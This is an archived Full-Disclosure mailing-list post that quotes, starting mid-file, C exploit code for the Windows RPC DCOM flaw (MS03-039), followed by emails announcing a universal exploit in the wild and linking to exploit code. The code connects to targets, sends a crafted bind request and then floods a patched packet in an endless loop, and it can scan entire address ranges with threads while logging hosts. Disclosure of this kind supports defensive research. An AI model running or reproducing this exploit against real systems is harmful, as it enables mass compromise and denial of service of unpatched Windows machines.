    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc; 
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc; 
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc; 
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc; 
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc; 
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc; 
      
     closesocket(sock); 
     if(atack) 
     { 
          sock=socket(2,1,0); 
          WSAConnect(sock,(struct sockaddr
*)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL); 
      
          if (send(sock,(const char
*)bindstr,sizeof(bindstr),0)==SOCKET_ERROR) 
          { 
            printf("%s - send failed %d\n",ip,WSAGetLastError()); 
            return 0; 
          } 
          else {printf("%s - send exploit to
%s\n",ip,target_os[vers].target);} 
          
         len=recv(sock,(char *)buf1,1000,NULL); 
          bool ft=1; 
          if(ft) 
          { 
               int i=0; 
               while(1) 
               { 
                    if (send(sock,(const char
*)buf2,len1,0)==SOCKET_ERROR) 
                    { 
                         printf("\nSend
failed.Error:%d\n",WSAGetLastError()); 
                         return 0; 
                    } 
                    else 
                    { 
                         printf("\r%d",++i); 
                    } 
                    //Sleep(1000); 
               } 
          } 
          send(sock,(const char *)buf2,len1,0); 
          closesocket(sock); 
     } 
     else fprintf(fp1,"%s %s\n",target_os[vers].target,ip); 
//     fp=fopen("pac","wb"); 
//     fwrite(rawData,1,1036,fp); 
//     fclose(fp); 
} 
unsigned long thread_count=0; 
char adr[200]; 

DWORD WINAPI ThreadProc( 
LPVOID lpParameter   // thread data 
) 
{ 
     thread_count++; 
     attack(adr,0); 

     thread_count--; 
     return 0; 
} 

void main(int argc,char ** argv) 
{ 
//printf("%x %x",OF_READWRITE,GETSTRCS(argv[1])); 
//return; 
//HFILE hf=_lopen("asd123",0x1001); 
//printf("%x",hf); 
//_lclose(hf); 
//return; 

WSADATA wsaData; 

int wVersionRequested; 
wVersionRequested = MAKEWORD( 2, 2 ); 

int err = WSAStartup( wVersionRequested, &wsaData ); 
if ( err != 0 ) { 
    /* Tell the user that we could not find a usable */ 
    /* WinSock DLL.                                  */ 
    return; 
} 

     if(strchr(argv[1],'.')) 
     { 
          attack(argv[1],1); 
          Sleep(20000); 
          return; 
     } 
     int cb=1,db=1; 
     cb=atoi(argv[3]); 
     db=atoi(argv[4]); 
     long tm=atoi(argv[5]); 
     for(int c=cb;c<255;c++) 
     { 
          for(int d=db;d<255;d++) 
          { 
               sprintf(adr,"%s.%s.%d.%d",argv[1],argv[2],c,d); 
               if(thread_count>tm) while(thread_count>tm) Sleep(100); 
               CreateThread(NULL,0,&ThreadProc,"",0,NULL); 
               Sleep(10); 
               fflush(fp1); 
          } 
     } 
     Sleep(60000); 
     fclose(fp1); 


} 
> 
> Bobby
> 
> -----Original Message-----
> From: Alex [mailto:pk95@...dex.ru]
> Sent: Friday, October 10, 2003 1:09 PM
> To: bugtraq@...urityfocus.com; full-disclosure@...ts.netsys.com;
> NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM
> Cc: Secure@...rosoft.com
> Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
> 
> 
> Exploit code can be found here:
> http://www.securitylab.ru/40754.html
> 
> This code work with  all  security  fixes. It's very dangerous.
> 
> ----- Original Message ----- 
> From: "3APA3A" <3APA3A@...URITY.NNOV.RU>
> To: <bugtraq@...urityfocus.com>; <full-disclosure@...ts.netsys.com>;
> <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>
> Cc: <Secure@...rosoft.com>
> Sent: Friday, October 10, 2003 6:48 PM
> Subject: Bad news on RPC DCOM vulnerability
> 
> 
> > Dear bugtraq@...urityfocus.com,
> >
> > There are few bad news on RPC DCOM vulnerability:
> >
> > 1.  Universal  exploit  for  MS03-039  exists in-the-wild, PINK FLOYD is
> > again actual.
> > 2.  It  was  reported  by exploit author (and confirmed), Windows XP SP1
> > with  all  security  fixes  installed still vulnerable to variant of the
> > same bug. Windows 2000/2003 was not tested. For a while only DoS exploit
> > exists,  but  code execution is probably possible. Technical details are
> > sent to Microsoft, waiting for confirmation.
> >
> > Dear  ISPs.  Please  instruct  you customers to use personal fireWALL in
> > Windows XP.
> >
> > -- 
> > http://www.security.nnov.ru
> >          /\_/\
> >         { , . }     |\
> > +--oQQo->{ ^ }<-----+ \
> > |  ZARAZA  U  3APA3A   }
> > +-------------o66o--+ /
> >                     |/
> > You know my name - look up my number (The Beatles)
> >
> >
> >
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> This message (including any attachments) contains confidential information
> intended for a specific individual and purpose, and is protected by law.  If
> you are not the intended recipient, you should delete this message.  Any
> disclosure, copying, or distribution of this message, or the taking of any
> action based on it, is strictly prohibited.
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ